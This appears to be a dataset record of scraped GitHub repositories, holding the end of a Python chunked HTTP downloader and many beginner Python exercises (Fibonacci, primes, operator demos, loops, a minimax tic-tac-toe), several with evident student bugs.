if the file is less\n than four megs it should be split in four chunks\n \"\"\"\n \n lowRange=int(chunknum*chunksize)\n hiRange=int((chunknum+1)*chunksize-1)\n\n \n custom_header = { 'Range':'bytes={}-{}'.format(lowRange,hiRange)}\n print(\"r\",end=\" \")\n req = requests.get(address,headers=custom_header)\n if req.status_code != requests.codes['partial_content']:\n print(\"this is an error reading the range {} to {}\".format(lowRange,hiRange))\n print(\"with status code \" + str(req.status_code))\n req.close()\n retval=None\n else:\n retval = req.content\n return retval\n\ndef verify_all(chunks):\n \"\"\"\n verify that all four chunks were recieved before writing them\n to file\n \"\"\"\n retval = True\n \n for i in range(len(chunks)):\n if chunks[i] == None:\n retval = false\n break\n return retval\n\ndef write_chunks(fname,chunks):\n \"\"\"\n write the chunk to file, return true if no issue\n false if an error\n \"\"\"\n retval=True\n\n try:\n f = open(fname,\"wb\");\n except Exception as e:\n print(e)\n print(\"Could not open the file \"+fname)\n retval=False\n return retval\n\n for i in range(len(chunks)):\n try: \n f.write(chunks[i])\n print(\"w \",end=\"\")\n except Exception as e:\n print(e)\n print(\"this is an error writing the segment \" + i)\n f.close()\n retval=False\n break\n return retval\n\ndef init_chunks(numchunks):\n for i in range(numchunks):\n chunks.append(None)\n return chunks\n\nchunks=[] \nparams=check_arg(sys.argv[1:])\naddress = params.address\nfname = params.o\nparallel=params.parallel\nnumchunks=params.segs\nmaxchunk=params.maxsize\n\nif maxchunk == 0:\n print(\"please select a larger maxsize size, 0 is not supported\")\n exit(1)\n \nchunks = init_chunks(numchunks)\n\nhead = get_header(address) \n\nif head.status_code != requests.codes['ok']:\n print(\"An error in the file transfer reading the file:\")\n print(address)\n print(\"the status code is \"+ str(head.status_code))\n sys.exit(1)\nelif head.headers[\"Accept-Ranges\"] == 
'none':\n print(\"Ranges not accepted by the server \" + address)\n sys.exit(1)\nelse:\n fileSize = int(head.headers['Content-Length'])\n\n if (fileSize < (numchunks*maxchunk)):\n segment_size = fileSize/numchunks\n else:\n segment_size=maxchunk\n fileSize = numchunks*maxchunk\n \n for i in range(numchunks) :\n chunks[i]=get_chunk(address,segment_size,i)\n\n if verify_all(chunks):\n if write_chunks(fname,chunks):\n print(\"done\")\n" } ]
1
Spasimir70/testrepo
https://github.com/Spasimir70/testrepo
34958708f2a2e01e4fa881b6c25470cf9f84dfa6
87671360ca33e99d48c3343d2c46efbe1963e327
89832070cd9b63af92ffca95d6072b9dd3f79f3b
refs/heads/master
2020-03-27T23:31:04.645017
2014-11-03T23:20:08
2014-11-03T23:20:08
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6315789222717285, "alphanum_fraction": 0.6526315808296204, "avg_line_length": 20.22222137451172, "blob_id": "953ed4e688c7216cbb079ce3b0e3baaa2d0cb885", "content_id": "3b67f4f790ae91b3f1e3055b4a95d8bb93c9ccf6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 190, "license_type": "no_license", "max_line_length": 42, "num_lines": 9, "path": "/unique_words.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def unique_words_count(arr):\n\tdiction = {}\n\tunique = 0\n\tfor i in arr:\n\t\tdiction[i] = arr.count(i)\n\tfor key in diction:\n\t\tunique += 1\n\treturn unique\nprint(unique_words_count([\"HELLO!\"] * 10))" }, { "alpha_fraction": 0.560538113117218, "alphanum_fraction": 0.6008968353271484, "avg_line_length": 23.66666603088379, "blob_id": "b94c61b50afa81bc428a8952f6085f0820bcf75b", "content_id": "a15fce877eb5f6dde6566e474ca48efd44fe34ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 78, "num_lines": 9, "path": "/fibonacci_list.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def nth_fib_lists(listA, listB, n):\n\tif n == 1\n\t return listA\n\telif n == 2:\n\t return listB\n\telse:\n\t return nth_fib_lists(listA, listB, n-1) + nth_fib_lists(listA, listB, n-2)\n\nprint(nth_fib_lists([1, 2], [1, 3], 6))\n\n" }, { "alpha_fraction": 0.5327102541923523, "alphanum_fraction": 0.5514018535614014, "avg_line_length": 15.538461685180664, "blob_id": "a9b3a61cc093b933ff23b9c9cbc8a000b53321c2", "content_id": "43464b23601d0e5707c34c567897161c66511052", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 214, "license_type": "no_license", "max_line_length": 35, "num_lines": 13, "path": "/zadacha 3 - sum all divisors.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", 
"text": "def sum_of_divisors(n):\n\tsum = 0\n\tfor i in range (1, n+1):\n\t\tif n % i == 0:\n\t\t\tsum += i\n\treturn sum\n\ndef main():\n\tnum = int(input(\"Input a number\"))\n\tprint (sum_of_divisors(num))\n\nif __name__ == '__main__':\n\tmain()" }, { "alpha_fraction": 0.4720194637775421, "alphanum_fraction": 0.49635037779808044, "avg_line_length": 24.6875, "blob_id": "a8d4980035cf68c86a19aea9f377697fb194df25", "content_id": "d788442b8be11dd92459fae3b03f1b8b41167443", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 411, "license_type": "no_license", "max_line_length": 69, "num_lines": 16, "path": "/zadacha 4 - prime.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def is_prime():\n if n < 0:\n n = -1 * n\n is_number_prime = False if (n % 2 == 0 and n != 2 or n == 1) else\n i = 3\n while i < (ceil(sqrt(n)) + 1) and is_number_prime:\n is_number_prime = (False if (n % i == 0) else True)\n i += 2\n return is_number_prime\n\ndef main():\n num = int (input(\"Input a number\"))\n print (is_number_prime(num))\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6693548560142517, "alphanum_fraction": 0.6693548560142517, "avg_line_length": 29.875, "blob_id": "11596798c817ffec182abf8a98f0380f6335344e", "content_id": "1534b7c41dfc540dff830caeb3c88a9d846efe23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 248, "license_type": "no_license", "max_line_length": 89, "num_lines": 8, "path": "/testtest.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "print \"How old are you?\"\nage = raw_input()\nprint \"Where are you from?\"\nplace = raw_input()\nprint \"What is your favourite football team?\"\nteam = raw_input()\n\nprint \"So, your name is %r, you are from %r and you are a fan of %r\" % (age, place, team)\n\n" }, { "alpha_fraction": 0.6227545142173767, "alphanum_fraction": 0.628742516040802, 
"avg_line_length": 19.875, "blob_id": "e7302fc162871bfab1244849e3e9778c5d456068", "content_id": "fe7d54767c86f8dc296c18c59204eaba8913f7e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 167, "license_type": "no_license", "max_line_length": 58, "num_lines": 8, "path": "/count_words.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def count_words(arr):\n\tdiction = {}\n\tcount = 0\n\tfor i in arr:\n\t\tdiction[i] = arr.count(i)\n\t\treturn diction\n\nprint(count_words([\"python\", \"python\", \"python\", \"ruby\"]))\n" }, { "alpha_fraction": 0.5894039869308472, "alphanum_fraction": 0.5960264801979065, "avg_line_length": 19.545454025268555, "blob_id": "6ad56aa94876f21dc0cb8915df3f2da215cef245", "content_id": "94d5c24a2edffea61db30c7e51fb303a1abdc0ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 453, "license_type": "no_license", "max_line_length": 55, "num_lines": 22, "path": "/zadacha 6 - n sevens in a row.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def sevens_in_a_row(arr, n):\n\tbr = 0\n\tfor i in range(arr):\n\t\tif arr[i] == 7:\n\t\t\tbr += 0\n\treturn br == n\n\ndef main():\n\tarray = list()\n\tnum = int(input(\"Enter how many elements you want: \"))\n\tprint ('Enter number in array:')\n\tfor i in range(num):\n\t\tn = input(\"num :\")\n\t\tarray.append(int(n))\n\tprint ('ARRAY: ', array)\n\n\tnum_of_sevens = int(input(\"Enter number of sevens\"))\n\tprint sevens_in_a_row(array, num_of_sevens)\n\n\nif __name__ == '__main__':\n\tmain()\n " }, { "alpha_fraction": 0.5275229215621948, "alphanum_fraction": 0.5412843823432922, "avg_line_length": 28, "blob_id": "293ed56fab018c24e33ec2ddc8673336145cc618", "content_id": "c873a5171ebd8c78c7c3d7ba18b003d1c9a85c2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 436, "license_type": 
"no_license", "max_line_length": 68, "num_lines": 15, "path": "/zadacha 1 - Fibonacci.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def nth_fibonacci(n):\n if n = 1 or n = 2:\n return 1\n else:\n return nth_fibonacci(n-1) + nth_fibonacci(n-2)\n\ndef main():\n n = int(input(Enter a place in the Fibonacci's row))\n while n>= 0:\n print (\"Wrong input! Your place must be a positive number!\")\n n = int(input(\"Enter a new place in Fibonacci's row:\"))\n print (nth_fibonacci(n))\n\n if __name__ == '__main__':\n main()\n\n" }, { "alpha_fraction": 0.6571798324584961, "alphanum_fraction": 0.6934023499488831, "avg_line_length": 24.799999237060547, "blob_id": "f91d4cca2ab223d68319458f4a7eb431646ce1d7", "content_id": "f8ec6d571815fbe4da8ac1bd5943bf9756891d3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 773, "license_type": "no_license", "max_line_length": 57, "num_lines": 30, "path": "/cash_desk_test.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "import unittest\n\nfrom cash_desk import cash_desk\n\nclass CashDeskTest(unittest.TestCase):\n\n\tdef test_total_zero_when_new_instance_made():\n\t\tnew_cash_desk = CashDesk()\n\t\tself.assertEqual(0, new_cash_desk.total())\n\n\n\tdef test_total_zero_when_new_instance_made():\n\t\tnew_cash_desk = CashDesk()\n\t\tnew_cash_desk.take_money({1: 2, 100: 3})\n\t\tself.assertEqual(302, new_cash_desk.total())\n\n\n\tdef test_can_withdraw_money_all_money():\n\t\tnew_cash_desk = CashDesk()\n\t\tnew_cash_desk.take_money({1: 2, 100: 3})\n\t\tself.assertTrue(new_cash_desk.can_withdraw_money(302))\n\n\n def test_can_withdraw_money_all_money():\n\t\tnew_cash_desk = CashDesk()\n\t\tnew_cash_desk.take_money({1: 2, 100: 3})\n\t\tself.assertFalse(new_Cash_desk.can_withdraw_monet(302))\n\nif __name__ == '__main__':\n\tunittest.main()" }, { "alpha_fraction": 0.4628821015357971, "alphanum_fraction": 0.4978165924549103, 
"avg_line_length": 14.333333015441895, "blob_id": "0cda7d08657af402abcef2a4eaddc4f6a7ca433e", "content_id": "bc8ca1ffea38ae7b1e122c68211845ae4baceb4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 229, "license_type": "no_license", "max_line_length": 35, "num_lines": 15, "path": "/zadacha 2 - sum of digits of a number.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def sum_of_digits(n):\n\tif n < 0:\n\t\tn = -1 * n\n\t\tsum = 0\n\t\twhile (n > 0):\n\t\t\tsum += n % 10\n\t\t\tn //= 10\n\t\treturn sum\n\ndef main():\n\tnum = int(input(\"Input a number\"))\n\tprint (sum_of_digits(num))\n\n\tif __name__ == '__main__':\n\t\tmain()" }, { "alpha_fraction": 0.6321839094161987, "alphanum_fraction": 0.6465517282485962, "avg_line_length": 19.47058868408203, "blob_id": "0baf83afe2d462e8eedfabceadb88546b0f92ca9", "content_id": "2d66c67776d3c78d76ed476e1fb0bdadcec0326d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 348, "license_type": "no_license", "max_line_length": 40, "num_lines": 17, "path": "/zadacha 5 - prime number of divisors.py", "repo_name": "Spasimir70/testrepo", "src_encoding": "UTF-8", "text": "def prime_number_of_divisors(n):\n\tnumber = 0\n\tfor i in range(1, n+1):\n\t\tif n % i == 0\n\t\tnumber +=1\n\tretun number\n\ndef prime_number_of_divisors(n):\n\tnumber_divisors = number_of_divisors(n)\n\treturn is_prime(number_divisors)\n\ndef main():\n\tnum = int(input(\"Input a number: \"))\n\tprint (prime_number_of_divisors(num))\n\nif __name__ == '__main__':\n\tmain()\n" } ]
11
Sumindar/Basic-python
https://github.com/Sumindar/Basic-python
bbb9d1290f827457d8da8299ebf5d970924349ca
e2afc654bd3e1d468ac706b2184efb491fcc863d
f0003c402094c4efa5717610c9d527dfea7e1b8e
refs/heads/master
2020-03-21T15:14:43.079993
2018-06-26T07:39:25
2018-06-26T07:39:25
138,701,605
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.8039215803146362, "alphanum_fraction": 0.8039215803146362, "avg_line_length": 24.5, "blob_id": "7f2ea7524de09d057ead2cd251b8a6e9da4e0319", "content_id": "27cffe2c3fa89d36447860c61a23aa0bbcc808b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 51, "license_type": "no_license", "max_line_length": 35, "num_lines": 2, "path": "/README.md", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "# Basic-python\nIt consists of some python examples\n" }, { "alpha_fraction": 0.6538461446762085, "alphanum_fraction": 0.6868131756782532, "avg_line_length": 24, "blob_id": "72e2f0319f64cc52dddccca145b2366ff5810647", "content_id": "d2d9446442c0018d303608e9180b5c55a03885ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 182, "license_type": "no_license", "max_line_length": 30, "num_lines": 7, "path": "/strings.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "message = \"hi!this is python\"\r\n\r\nprint(str.capitalize(message))\r\nprint (message.center(50,' '))\r\nprint(message.center(60,'*'))\r\nprint(message.center(80))\r\nprint(message.count('s')s\r\n" }, { "alpha_fraction": 0.3396226465702057, "alphanum_fraction": 0.3811320662498474, "avg_line_length": 14.5625, "blob_id": "3804e85ee9a146f34cd7df65a1e58f32ed20f376", "content_id": "fa414d90cad74618e1b8054c49f6a1988898d4c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 265, "license_type": "no_license", "max_line_length": 53, "num_lines": 16, "path": "/nested_loops.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "count = 10\r\nx = 0\r\nwhile x < count:\r\n y = 0\r\n while y < 11:\r\n print(y)\r\n y = y + 1\r\n x = x + 1 \r\n\r\nname = [\"mark\",\"fred\",\"tom\",\"craig\",\"bobby\",\"martha\"]\r\n\r\nfor x in name:\r\n y = 0\r\n while y < 5:\r\n print 
(x)\r\n y = y + 1\r\n" }, { "alpha_fraction": 0.44950494170188904, "alphanum_fraction": 0.513861358165741, "avg_line_length": 27.705883026123047, "blob_id": "f3a4552b3cee4ef2eb4974f32400a508e3f871bb", "content_id": "89425190301753f1e109e3a3c922e1538c8026b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2020, "license_type": "no_license", "max_line_length": 58, "num_lines": 68, "path": "/letscalculate.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "print(\"hello world\")\r\na = 21\r\nb = 10\r\nc = 0\r\nc = a + b\r\nprint (\"Line 1 - Value of c is \", c)\r\nc += a\r\nprint (\"Line 2 - Value of c is \", c )\r\nc *= a\r\nprint (\"Line 3 - Value of c is \", c )\r\nc /= a \r\nprint (\"Line 4 - Value of c is \", c )\r\nc = 2\r\nc %= a\r\nprint (\"Line 5 - Value of c is \", c)\r\nc **= a\r\nprint (\"Line 6 - Value of c is \", c)\r\nc //= a\r\nprint (\"Line 7 - Value of c is \", c)\r\na = 60 # 60 = 0011 1100\r\nb = 13 # 13 = 0000 1101\r\nprint ('a=',a,':',bin(a),'b=',b,':',bin(b))\r\nc = 0\r\nc = a & b; # 12 = 0000 1100\r\nprint (\"result of AND is \", c,':',bin(c))\r\nc = a | b; # 61 = 0011 1101 \r\nprint (\"result of OR is \", c,':',bin(c))\r\nc = a ^ b; # 49 = 0011 0001\r\nprint (\"result of EXOR is \", c,':',bin(c))\r\nc = ~a; # -61 = 1100 0011\r\nprint (\"result of COMPLEMENT is \", c,':',bin(c))\r\nc = a << 2; # 240 = 1111 0000\r\nprint (\"result of LEFT SHIFT is \", c,':',bin(c))\r\nc = a >> 2; # 15 = 0000 1111\r\nprint (\"result of RIGHT SHIFT is \", c,':',bin(c))\r\na = 10\r\nb = 20\r\nlist = [1, 2, 3, 4, 5 ]\r\nif ( a in list ):\r\n print (\"Line 1 - a is available in the given list\")\r\nelse:\r\n print (\"Line 1 - a is not available in the given list\")\r\nif ( b not in list ):\r\n print (\"Line 2 - b is not available in the given list\")\r\nelse:\r\n print (\"Line 2 - b is available in the given list\")\r\nc=b/a\r\nif ( c in list ):\r\n print (\"Line 3 - a is available in 
the given list\")\r\nelse:\r\n print (\"Line 3 - a is not available in the given list\")\r\na = 20\r\nb = 20\r\nprint ('Line 1','a=',a,':',id(a), 'b=',b,':',id(b))\r\nif ( a is b ):\r\n print (\"Line 2 - a and b have same identity\")\r\nelse:\r\n print (\"Line 2 - a and b do not have same identity\")\r\nif ( id(a) == id(b) ):\r\n print (\"Line 3 - a and b have same identity\")\r\nelse:\r\n print (\"Line 3 - a and b do not have same identity\")\r\n b = 30\r\nprint ('Line 4','a=',a,':',id(a), 'b=',b,':',id(b))\r\nif ( a is not b ):\r\n print (\"Line 5 - a and b do not have same identity\")\r\nelse:\r\n print (\"Line 5 - a and b have same identity\")\r\n" }, { "alpha_fraction": 0.3776824176311493, "alphanum_fraction": 0.6738197207450867, "avg_line_length": 13.533333778381348, "blob_id": "6e23a404dd53af6e2f46378c18122e3977dfe92c", "content_id": "b27a856b05727b46ca1f904d0f9be6758bc52c3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 233, "license_type": "no_license", "max_line_length": 28, "num_lines": 15, "path": "/casting.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "x = 35\r\nprint(x)\r\nx = 35.666666\r\nprint(x)\r\nx=int(x)\r\nprint(x)\r\nprint(int(0.67565))\r\ny=50\r\nprint(y)\r\nprint(float(y))\r\nprint(x*y)\r\nprint(int(x)*int(y))\r\ncomplex(553533645375378383)\r\nprint(687675675675645454564)\r\nint(575655656e+21+0j)\r\n" }, { "alpha_fraction": 0.6245847344398499, "alphanum_fraction": 0.6378737688064575, "avg_line_length": 28.100000381469727, "blob_id": "3af8b708336a8cadd85ff8aade6adc67c88ae5cb", "content_id": "92f13ddabf9e3d139542d0ad432ba85bbcff39d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 301, "license_type": "no_license", "max_line_length": 67, "num_lines": 10, "path": "/forloop.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "courseName = \"pyhton for begineers 
2018\"\r\n\r\nfor letter in courseName:\r\n print(\"current letter is\",letter)\r\n if (letter == \" \"):\r\n print(\"this is space character\")\r\n\r\nbands = [\"journey\",\"reo speedwagon\",\"foreigner\",\"heart\",\"the cure\"]\r\nfor band in bands:\r\n print(\"current band:\",band)\r\n" }, { "alpha_fraction": 0.48672565817832947, "alphanum_fraction": 0.5420354008674622, "avg_line_length": 12.933333396911621, "blob_id": "fc0252c39c83e979ae2bda8dd1552740d0432232", "content_id": "d4c2c55adbd5a2c68d9782271e3734ceb3afc724", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 452, "license_type": "no_license", "max_line_length": 45, "num_lines": 30, "path": "/examples.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "print(5 - 6 *2)\r\nprint((5 - 6) * 2)\r\nprint(3 ** 3 * 5)\r\nprint ( 3 ** (3 * 5))\r\n\r\n#parenthesis\r\n#exponents\r\n#multiplication\r\n#division\r\n#addition\r\n#subtraction\r\n\r\n#while loop\r\nx=0\r\nwhile (x<25):\r\n print(\"the x is:\",x)\r\n x=x+1\r\n\r\ncounter = 100\r\nwhile(counter > 0):\r\n print(counter)\r\n counter = counter - 10\r\nelse:\r\n print(\"y is no longer greater than zero\")\r\n\r\n\r\n#y = 1\r\n#while (y>0):\r\n# print (y)\r\n# y = y + 1 indefinite loop\r\n\r\n\r\n" }, { "alpha_fraction": 0.6802507638931274, "alphanum_fraction": 0.7084639668464661, "avg_line_length": 29.299999237060547, "blob_id": "be3381f64b57f8e91f58fe9f5b91afe4a8a1a550", "content_id": "670ba80f2884dc08d313af1bceb28cbc78e485ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 319, "license_type": "no_license", "max_line_length": 115, "num_lines": 10, "path": "/random.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "import random\r\n\r\nnames = [\"fred\",\"mary\",\"thomas\",\"kevin\",\"mike\",\"june\"]\r\n\r\nprint(random.choice(names)) #picks out names 
randomly\r\n\r\nrandom.shuffle(names)#randomly shuffles in it.\r\nprint(names)\r\n\r\nprint(random.randrange(1,1000,10))#last value is step that a random should run for 10 steps to find a random number\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.5784753561019897, "alphanum_fraction": 0.6502242088317871, "avg_line_length": 15.916666984558105, "blob_id": "c09d568c94523c83ec89b600cee4a2792d894441", "content_id": "007a336696a835c8433ee6d0090d41fbfb433d7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 52, "num_lines": 12, "path": "/mathematical functions.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "import math\r\n\r\nvalue1 = 89.6\r\nvalue2 = 176\r\nprint(abs(value1 - value2))\r\n\r\nprint (math.ceil(value1)) #rounds to bigger number\r\n\r\nprint(math.floor(value1)) #rounds to smaller number\r\n\r\nprint(pow(3,4))\r\nprint(3**4)\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.5305466055870056, "alphanum_fraction": 0.5305466055870056, "avg_line_length": 19.785715103149414, "blob_id": "0c1a5afea1d5bb76bafab5aa39b7274e582f22ba", "content_id": "0e980de4e7cf07fa51c79b582de065cf4eb59315", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 311, "license_type": "no_license", "max_line_length": 43, "num_lines": 14, "path": "/break.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "statement = \"make hay while the sun shines\"\r\nfor x in statement:\r\n print(\"current letter\",x)\r\n if x == \"e\":\r\n break\r\n\r\nfor x in statement:\r\n if x == \"e\":\r\n break\r\n print(\"current letter\",x)\r\nfor x in statement:\r\n if x == \"w\":\r\n continue\r\n print(\"current letter\",x)\r\n \r\n" }, { "alpha_fraction": 0.3880368173122406, "alphanum_fraction": 0.44631901383399963, "avg_line_length": 27.636363983154297, "blob_id": 
"2a3bcf6e83278747b36e6f805080d1b5a7733db5", "content_id": "5ab3c557c41c914ac49d8dbfbbe72888d0670983", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 44, "num_lines": 22, "path": "/opentheparenthesis.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "a = 20\r\nb = 10\r\nc = 15\r\nd = 5\r\nprint (\"a:%d b:%d c:%d d:%d\" % (a,b,c,d ))\r\ne = (a + b) * c / d #( 30 * 15 ) / 5\r\nprint (\"Value of (a + b) * c / d is \", e)\r\ne = ((a + b) * c) / d # (30 * 15 ) / 5\r\nprint (\"Value of ((a + b) * c) / d is \", e)\r\ne = (a + b) * (c / d) # (30) * (15/5)\r\nprint (\"Value of (a + b) * (c / d) is \", e)\r\ne = a + (b * c) / d # 20 + (150/5)\r\nprint (\"Value of a + (b * c) / d is \", e)\r\namount=int(input(\"Enter amount: \"))\r\nif amount<1000:\r\n discount=amount*0.05\r\n print (\"Discount\",discount)\r\nelse:\r\n discount=amount*0.10\r\n print (\"Discount\",discount)\r\n \r\nprint (\"Net payable:\",amount-discount)\r\n" }, { "alpha_fraction": 0.5644115209579468, "alphanum_fraction": 0.5977756977081299, "avg_line_length": 20.020408630371094, "blob_id": "0c5c95d9150b9a56428fd4dd2196dbbe5086a573", "content_id": "762619da0c248775ae9d75fcf8d7e5bad4b458ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1079, "license_type": "no_license", "max_line_length": 62, "num_lines": 49, "path": "/prac.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "# This program adds two numbers\r\n\r\nnum1 = 1.5\r\nnum2 = 6.3\r\n\r\n# Add two numbers\r\nsum = float(num1) + float(num2)\r\n\r\n# Display the sum\r\nprint('The sum of {0} and {1} is {2}'.format(num1, num2, sum))\r\n# Python Program to find the area of triangle\r\n\r\na = 5\r\nb = 6\r\nc = 7\r\n\r\n# Uncomment below to take inputs from the user\r\n# a = float(input('Enter first side: '))\r\n# b = float(input('Enter 
second side: '))\r\n# c = float(input('Enter third side: '))\r\n\r\n# calculate the semi-perimeter\r\ns = (a + b + c) / 2\r\n\r\n# calculate the area\r\narea = (s*(s-a)*(s-b)*(s-c)) ** 0.5\r\nprint('The area of the triangle is %0.2f' %area)\r\n# Solve the quadratic equation ax**2 + bx + c = 0\r\n\r\n# import complex math module\r\nimport cmath\r\n\r\na = 1\r\nb = 5\r\nc = 6\r\n\r\n# To take coefficient input from the users\r\n# a = float(input('Enter a: '))\r\n# b = float(input('Enter b: '))\r\n# c = float(input('Enter c: '))\r\n\r\n# calculate the discriminant\r\nd = (b**2) - (4*a*c)\r\n\r\n# find two solutions\r\nsol1 = (-b-cmath.sqrt(d))/(2*a)\r\nsol2 = (-b+cmath.sqrt(d))/(2*a)\r\n\r\nprint('The solution are {0} and {1}'.format(sol1,sol2))\r\n" } ]
12
yashmunjal1412/TicTacToe_Minimax
https://github.com/yashmunjal1412/TicTacToe_Minimax
c224b78926f76150044fa5592cba68f567ce2321
d8d42bce4265ebd95744976d0eb92226935d2a26
8028d574b66e1b7c8ee2e1796ee0dab22bb118d0
refs/heads/master
2022-11-29T17:05:06.818060
2020-08-15T12:38:44
2020-08-15T12:38:44
287,741,040
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.41917484998703003, "alphanum_fraction": 0.4467772841453552, "avg_line_length": 29.266666412353516, "blob_id": "f46b1c223749fb222380825cc1f6b05769d0ccbc", "content_id": "7ecb5021ea3c50df277dc9ec45daf557a9a6b2b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6811, "license_type": "no_license", "max_line_length": 331, "num_lines": 225, "path": "/TicTacToe_minimax.py", "repo_name": "yashmunjal1412/TicTacToe_Minimax", "src_encoding": "UTF-8", "text": "\nfrom math import inf as infinity\nfrom random import choice\nUSER = -1\nCPU = +1\nboard = [ [0, 0, 0],[0, 0, 0],[0, 0, 0],]\nmark = [ [0, 0, 0],[0, 0, 0],[0, 0, 0],] #Used to draw the board state\ndef title(): \n print(' _______________________________________________________________ ')\n print(\"| _____ _ ____ _____ ____ ____ _____ ____ _____ |\")\n print(\"| /__ __\\/ \\/ _\\ /__ __\\/ _ \\/ _\\ /__ __\\/ _ \\/ __/ |\") \n print(\"| / \\ | || / _____ / \\ | / \\|| / _____ / \\ | / \\|| \\ |\") \n print(\"| | | | || \\_\\____\\| | | |-||| \\_\\____\\| | | \\_/|| /_ |\") \n print(\"| \\_/ \\_/\\____/ \\_/ \\_/ \\|\\____/ \\_/ \\____/\\____\\ |\")\n print(\"| by YASH MUNJAL |\")\n print('|_______________________________________________________________|\\n')\n\ndef evaluate(board): #Evaluates the leaves of game tree\n\n if wins(board, CPU):\n score = +1\n elif wins(board, USER):\n score = -1\n else:\n score = 0\n\n return score\n\ndef game_end(board): # Checks whether user or cpu has won the game\n\n return wins(board, USER) or wins(board, CPU)\n\ndef empty_cells(board): #Returns list of empty cells\n cells = []\n\n for x, row in enumerate(board):\n for y, box in enumerate(row):\n if box == 0:\n cells.append([x, y])\n\n return cells\n\n\ndef valid(x, y): #Checks whether the move is valid or not\n if [x, y] in empty_cells(board):\n return True\n else:\n return False\n\n\ndef wins(board, player): # Checks whether the player(cpu or user) has 
won or not\n\n win_state = [\n [board[0][0], board[0][1], board[0][2]], [board[1][0], board[1][1], board[1][2]],[board[2][0], board[2][1], board[2][2]], [board[0][0], board[1][0], board[2][0]],[board[0][1], board[1][1], board[2][1]],[board[0][2], board[1][2], board[2][2]], [board[0][0], board[1][1], board[2][2]],[board[2][0], board[1][1], board[0][2]],\n ]\n if [player, player, player] in win_state:\n return True\n else:\n return False\n\ndef set_marker(x, y, player): # Sets the marker at a cell\n\n if valid(x, y):\n board[x][y] = player\n return True\n else:\n return False\n\n\ndef minimax(board, depth, player): # MINIMAX function to obtain optimal move\n\n if player == CPU:\n move = [-1, -1, -infinity]\n else:\n move = [-1, -1, +infinity]\n\n if depth == 0 or game_end(board):\n score = evaluate(board)\n return [-1, -1, score]\n\n for box in empty_cells(board):\n x, y = box[0], box[1]\n board[x][y] = player\n score = minimax(board, depth - 1, -player)\n board[x][y] = 0\n score[0], score[1] = x, y\n\n if player == CPU:\n if score[2] > move[2]:\n move = score # max value\n else:\n if score[2] < move[2]:\n move = score # min value\n\n return move\n\ndef draw_board(board, cpu_marker, user_marker): #Draws the current state of game board\n\n for x in [0,1,2]:\n for y in [0,1,2]:\n if board[x][y]==-1:\n mark[x][y]=user_marker\n elif board[x][y]==1:\n mark[x][y]=cpu_marker\n elif board[x][y]==0:\n mark[x][y]=' '\n\n print()\n print(' reference:')\n print(' | | 